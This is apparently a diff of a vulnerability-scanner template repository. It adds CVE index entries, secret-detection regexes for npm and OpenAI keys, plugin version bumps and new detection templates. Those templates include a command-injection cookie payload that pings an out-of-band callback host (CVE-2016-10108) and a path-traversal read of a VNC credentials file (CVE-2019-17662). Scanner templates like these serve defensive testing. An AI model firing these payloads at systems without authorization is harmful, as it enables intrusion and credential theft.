 {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
 {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}
@@ -1913,6 +1920,7 @@
 {"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
 {"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
 {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
+{"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"}
 {"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
 {"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
 {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"}
@@ -1942,6 +1950,7 @@
 {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
 {"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"}
 {"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"}
+{"ID":"CVE-2023-30150","Info":{"Name":"PrestaShop leocustomajax 1.0 \u0026 1.0.0 - SQL Injection","Severity":"critical","Description":"PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30150.yaml"}
 {"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"}
 {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 -  Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
 {"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"}
@@ -1952,12 +1961,14 @@
 {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
 {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"}
 {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
+{"ID":"CVE-2023-32563","Info":{"Name":"Ivanti Avalanche - Remote Code Execution","Severity":"critical","Description":"An unauthenticated attacker could achieve the code execution through a RemoteControl server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32563.yaml"}
 {"ID":"CVE-2023-33338","Info":{"Name":"Old Age Home Management System v1.0 - SQL Injection","Severity":"critical","Description":"Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33338.yaml"}
 {"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"}
 {"ID":"CVE-2023-33440","Info":{"Name":"Faculty Evaluation System v1.0 - Remote Code Execution","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33440.yaml"}
 {"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
 {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
 {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
+{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
 {"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
 {"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"}
 {"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
@@ -1975,6 +1986,7 @@
 {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"}
 {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
 {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
+{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"critical","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
 {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
 {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
 {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}
@@ -1982,10 +1994,14 @@
 {"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"critical","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"}
 {"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"}
 {"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"}
+{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
 {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
 {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"high","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
 {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
+{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
 {"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
+{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
 {"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
+{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
 {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-2a27df6e7720e91115a6f5f83175f4ea
+308d34aa657fe5afcd52692063fe2203

file/keys/npm-accesstoken.yaml

@@ -21,4 +21,4 @@ file:
       - type: regex
         part: body
         regex:
-          - "(npm_[A-Za-z0-9]{36})"
+          - "\b(npm_[A-Za-z0-9]{36})\b"

file/keys/openai-key.yaml

@@ -20,4 +20,4 @@ file:
       - type: regex
         part: body
         regex:
-          - "(sk-[a-zA-Z0-9]{48})"
+          - \b(sk-[a-zA-Z0-9]{48})\b

helpers/wordpress/plugins/all-in-one-wp-migration.txt

@@ -1 +1 @@
-7.77
+7.78

helpers/wordpress/plugins/coblocks.txt

@@ -1 +1 @@
-3.1.2
+3.1.3

helpers/wordpress/plugins/custom-fonts.txt

@@ -1 +1 @@
-2.0.2
+2.1.0

helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt

@@ -1 +1 @@
-1.18
+1.18.1

helpers/wordpress/plugins/elementskit-lite.txt

@@ -1 +1 @@
-2.9.0
+2.9.2

helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt

@@ -1 +1 @@
-5.8.6
+5.8.7

helpers/wordpress/plugins/fluentform.txt

@@ -1 +1 @@
-5.0.7
+5.0.8

helpers/wordpress/plugins/formidable.txt

@@ -1 +1 @@
-6.4.1
+6.4.2

helpers/wordpress/plugins/forminator.txt

@@ -1 +1 @@
-1.25.1
+1.25.2

helpers/wordpress/plugins/gdpr-cookie-compliance.txt

@@ -1 +1 @@
-4.12.5
+4.12.6

helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt

@@ -1 +1 @@
-7.18.1
+7.19

helpers/wordpress/plugins/google-analytics-for-wordpress.txt

@@ -1 +1 @@
-8.18
+8.19

helpers/wordpress/plugins/google-listings-and-ads.txt

@@ -1 +1 @@
-2.5.2
+2.5.4

helpers/wordpress/plugins/google-site-kit.txt

@@ -1 +1 @@
-1.107.0
+1.108.0

helpers/wordpress/plugins/gtranslate.txt

@@ -1 +1 @@
-3.0.3
+3.0.4

helpers/wordpress/plugins/gutenberg.txt

@@ -1 +1 @@
-16.4.0
+16.5.1

helpers/wordpress/plugins/host-webfonts-local.txt

@@ -1 +1 @@
-5.6.5
+5.6.7

helpers/wordpress/plugins/insert-headers-and-footers.txt

@@ -1 +1 @@
-2.1.1
+2.1.2

helpers/wordpress/plugins/jetpack.txt

@@ -1 +1 @@
-12.4
+12.5

helpers/wordpress/plugins/kadence-blocks.txt

@@ -1 +1 @@
-3.1.12
+3.1.13

helpers/wordpress/plugins/leadin.txt

@@ -1 +1 @@
-10.2.1
+10.2.3

helpers/wordpress/plugins/limit-login-attempts-reloaded.txt

@@ -1 +1 @@
-2.25.22
+2.25.23

helpers/wordpress/plugins/mailchimp-for-wp.txt

@@ -1 +1 @@
-4.9.6
+4.9.7

helpers/wordpress/plugins/mailpoet.txt

@@ -1 +1 @@
-4.24.0
+4.26.0

helpers/wordpress/plugins/malcare-security.txt

@@ -1 +1 @@
-5.22
+5.24

helpers/wordpress/plugins/newsletter.txt

@@ -1 +1 @@
-7.9.0
+7.9.1

helpers/wordpress/plugins/optinmonster.txt

@@ -1 +1 @@
-2.13.7
+2.13.8

helpers/wordpress/plugins/pixelyoursite.txt

@@ -1 +1 @@
-9.4.2
+9.4.4

helpers/wordpress/plugins/post-smtp.txt

@@ -1 +1 @@
-2.5.9.3
+2.5.9.4

helpers/wordpress/plugins/premium-addons-for-elementor.txt

@@ -1 +1 @@
-4.10.4
+4.10.7

helpers/wordpress/plugins/seo-by-rank-math.txt

@@ -1 +1 @@
-1.0.121.1
+1.0.122

helpers/wordpress/plugins/sg-cachepress.txt

@@ -1 +1 @@
-7.3.4
+7.4.0

helpers/wordpress/plugins/siteorigin-panels.txt

@@ -1 +1 @@
-2.25.2
+2.25.3

helpers/wordpress/plugins/translatepress-multilingual.txt

@@ -1 +1 @@
-2.5.9
+2.6.0

helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt

@@ -1 +1 @@
-2.7.6
+2.7.7

helpers/wordpress/plugins/webp-converter-for-media.txt

@@ -1 +1 @@
-5.9.5
+5.9.6

helpers/wordpress/plugins/woocommerce-paypal-payments.txt

@@ -1 +1 @@
-2.2.0
+2.2.2

helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt

@@ -1 +1 @@
-3.6.1
+3.6.2

helpers/wordpress/plugins/woocommerce-services.txt

@@ -1 +1 @@
-2.3.2
+2.3.3

helpers/wordpress/plugins/woocommerce.txt

@@ -1 +1 @@
-8.0.2
+8.0.3

helpers/wordpress/plugins/wordpress-seo.txt

@@ -1 +1 @@
-20.13
+21.0

helpers/wordpress/plugins/wp-migrate-db.txt

@@ -1 +1 @@
-2.6.8
+2.6.9

helpers/wordpress/plugins/wp-seopress.txt

@@ -0,0 +1 @@
+6.9

helpers/wordpress/plugins/wp-smushit.txt

@@ -1 +1 @@
-3.14.1
+3.14.2

helpers/wordpress/plugins/wps-hide-login.txt

@@ -1 +1 @@
-1.9.8
+1.9.9

http/cnvd/2021/CNVD-2021-32799.yaml

@@ -0,0 +1,40 @@
+id: CNVD-2021-32799
+
+info:
+  name: 360 Xintianqing - SQL Injection
+  author: SleepingBag945
+  severity: high
+  reference:
+    - https://blog.51cto.com/u_9691128/4295047
+    - https://www.cnvd.org.cn/patchInfo/show/270651
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml
+  metadata:
+    fofa-query: app="360新天擎"
+    verified: true
+    max-request: 1
+  tags: cnvd,cnvd2021,360,xintianqing,sqli
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/dp/rptsvcsyncpoint?ccid=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"reason":'
+          - '"success"'
+          - '"antiadwa":'
+          - '"clientupgrade":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200

http/cves/2014/CVE-2014-4942.yaml

@@ -46,7 +46,7 @@ http:
 
     extractors:
       - type: regex
+        part: body
         group: 1
         regex:
-          - '>PHP Version <\/td><td class="v">([0-9.]+)'
-        part: body
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'

http/cves/2016/CVE-2016-10108.yaml

@@ -0,0 +1,40 @@
+id: CVE-2016-10108
+
+info:
+  name: Western Digital MyCloud NAS - Command Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
+  reference:
+    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108
+    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-10108
+    cwe-id: CWE-77
+    epss-score: 0.01264
+    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-1074357885
+    vendor: western_digital
+    product: mycloud_nas
+  tags: cve,cve2016,rce,oast,wdcloud
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "WDMyCloud")
+          - contains(interactsh_protocol, "dns")
+          - status_code == 200
+        condition: and

http/cves/2019/CVE-2019-17662.yaml

@@ -0,0 +1,45 @@
+id: CVE-2019-17662
+
+info:
+  name: ThinVNC 1.0b1 - Authentication Bypass
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
+  reference:
+    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
+    - https://github.com/bewest/thinvnc/issues/5
+    - https://redteamzone.com/ThinVNC/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-522,CWE-22
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-1414548363
+    verified: true
+  tags: cve,cve2019,auth-bypass,thinvnc
+
+http:
+  - raw:
+      - |
+        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "User="
+          - "Password="
+        condition: and
+
